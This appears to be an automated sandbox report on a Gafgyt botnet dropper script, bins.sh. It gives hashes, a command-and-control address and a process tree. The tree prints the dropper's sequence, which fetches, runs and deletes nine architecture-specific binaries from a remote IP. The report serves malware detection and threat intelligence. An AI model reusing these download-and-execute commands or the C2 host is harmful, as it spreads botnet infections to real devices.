Analysis

max time kernel: 92s
max time network: 14s
platform: debian-9_mipsel
resource: debian9-mipsel-20240729-en
resource tags: arch:mipsel, image:debian9-mipsel-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 03/08/2024, 04:52
Static task: static1

Behavioral task: behavioral1
  Sample: bins.sh
  Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
  Sample: bins.sh
  Resource: debian9-armhf-20240611-en

Behavioral task: behavioral3
  Sample: bins.sh
  Resource: debian9-mipsbe-20240418-en
General

Target: bins.sh
Size: 1KB
MD5: 0019152fa30c6a1f5babd6dc28ff797f
SHA1: 06fbe116674f61cccd777f807c072569373c93ef
SHA256: de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3
SHA512: 14fda525ebe67725117dd3187168e9b0aba4c79d1d10133c204406ab217a7a88cab2a982761ba2f5bbd71afbed4af6b70327acf071ec4c50433de529287af1db
Malware Config

Extracted: gafgyt
93.123.85.216:39
Signatures

Detected Gafgyt variant (9 IoCs)
  resource                           yara_rule
  behavioral4/files/fstream-1.dat    family_gafgyt
  behavioral4/files/fstream-2.dat    family_gafgyt
  behavioral4/files/fstream-3.dat    family_gafgyt
  behavioral4/files/fstream-4.dat    family_gafgyt
  behavioral4/files/fstream-5.dat    family_gafgyt
  behavioral4/files/fstream-6.dat    family_gafgyt
  behavioral4/files/fstream-7.dat    family_gafgyt
  behavioral4/files/fstream-8.dat    family_gafgyt
  behavioral4/files/fstream-9.dat    family_gafgyt

Executes dropped EXE (9 IoCs)
  ioc             pid   Process
  /tmp/boobs      728   boobs
  /tmp/boobs2     741   boobs2
  /tmp/roof       749   roof
  /tmp/ppc        754   ppc
  /tmp/sparc      759   sparc
  /tmp/darkness   764   darkness
  /tmp/arm5       773   arm5
  /tmp/arm6       786   arm6
  /tmp/NIGGA7     798   NIGGA7

Reads system routing table (1 TTPs, 1 IoCs)
Gets active network interfaces from /proc virtual filesystem.
  description                ioc               Process
  File opened for reading    /proc/net/route   boobs2

Reads system network configuration (1 TTPs, 1 IoCs)
Uses contents of /proc filesystem to enumerate network settings.
  description                ioc               Process
  File opened for reading    /proc/net/route   boobs2

Writes file to tmp directory (9 IoCs)
Malware often drops required files in the /tmp directory.
  description                     ioc             Process
  File opened for modification    /tmp/roof       wget
  File opened for modification    /tmp/ppc        wget
  File opened for modification    /tmp/sparc      wget
  File opened for modification    /tmp/darkness   wget
  File opened for modification    /tmp/boobs      wget
  File opened for modification    /tmp/boobs2     wget
  File opened for modification    /tmp/arm5       wget
  File opened for modification    /tmp/arm6       wget
  File opened for modification    /tmp/NIGGA7     wget
Processes

(image; command line; PID; signatures triggered by the process)

/tmp/bins.sh; /tmp/bins.sh; PID 708
    /usr/bin/wget; wget http://93.123.85.216/boobs; PID 715; Writes file to tmp directory
    /bin/chmod; chmod +x boobs; PID 726
    /tmp/boobs; ./boobs; PID 728; Executes dropped EXE
    /bin/rm; rm -rf boobs; PID 732
    /usr/bin/wget; wget http://93.123.85.216/boobs2; PID 734; Writes file to tmp directory
    /bin/chmod; chmod +x boobs2; PID 740
    /tmp/boobs2; ./boobs2; PID 741; Executes dropped EXE, Reads system routing table, Reads system network configuration
    /bin/rm; rm -rf boobs2; PID 744
    /usr/bin/wget; wget http://93.123.85.216/roof; PID 746; Writes file to tmp directory
    /bin/chmod; chmod +x roof; PID 748
    /tmp/roof; ./roof; PID 749; Executes dropped EXE
    /bin/rm; rm -rf roof; PID 751
    /usr/bin/wget; wget http://93.123.85.216/ppc; PID 752; Writes file to tmp directory
    /bin/chmod; chmod +x ppc; PID 753
    /tmp/ppc; ./ppc; PID 754; Executes dropped EXE
    /bin/rm; rm -rf ppc; PID 756
    /usr/bin/wget; wget http://93.123.85.216/sparc; PID 757; Writes file to tmp directory
    /bin/chmod; chmod +x sparc; PID 758
    /tmp/sparc; ./sparc; PID 759; Executes dropped EXE
    /bin/rm; rm -rf sparc; PID 761
    /usr/bin/wget; wget http://93.123.85.216/darkness; PID 762; Writes file to tmp directory
    /bin/chmod; chmod +x darkness; PID 763
    /tmp/darkness; ./darkness; PID 764; Executes dropped EXE
    /bin/rm; rm -rf darkness; PID 766
    /usr/bin/wget; wget http://93.123.85.216/arm5; PID 767; Writes file to tmp directory
    /bin/chmod; chmod +x arm5; PID 771
    /tmp/arm5; ./arm5; PID 773; Executes dropped EXE
    /bin/rm; rm -rf arm5; PID 775
    /usr/bin/wget; wget http://93.123.85.216/arm6; PID 777; Writes file to tmp directory
    /bin/chmod; chmod +x arm6; PID 784
    /tmp/arm6; ./arm6; PID 786; Executes dropped EXE
    /bin/rm; rm -rf arm6; PID 788
    /usr/bin/wget; wget http://93.123.85.216/NIGGA7; PID 789; Writes file to tmp directory
    /bin/chmod; chmod +x NIGGA7; PID 796
    /tmp/NIGGA7; ./NIGGA7; PID 798; Executes dropped EXE
    /bin/rm; rm -rf NIGGA7; PID 801
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 275KB
MD5: 658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1: ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA256: 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512: eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f

Filesize: 216KB
MD5: e57c0097d80d17a52aad01a8c2e4f9fc
SHA1: fffadcdb51b879236df4d4cdf373216dd926e90e
SHA256: 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA512: 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

Filesize: 238KB
MD5: 1e78f279e22858585947a52ad8b127d7
SHA1: 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256: 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA512: 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

Filesize: 246KB
MD5: 1f918589efbef4b04e806b7a38fc63f8
SHA1: 758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256: 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512: d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

Filesize: 246KB
MD5: 348a8f1c5535fe6a0a698f457c329485
SHA1: a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256: c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512: e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

Filesize: 224KB
MD5: 24393febb5e8a233a8df7f00b8c3b147
SHA1: f8240c5256c8a193ee8f2f93880203eca2f827d5
SHA256: 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512: be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

Filesize: 209KB
MD5: 5cf85a36699cca11be8c96c3232654e0
SHA1: 897379599414d22c9adf9b542266eb6b888b6542
SHA256: d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512: de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

Filesize: 211KB
MD5: ca477454b7145f6d2180e32c6f0135f6
SHA1: da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA256: 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512: 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

Filesize: 226KB
MD5: 0e2c431d0b76d5d91af24cd90532cd93
SHA1: 402554d878c7e73cdf145bb249c604a21e465e1f
SHA256: 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA512: 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc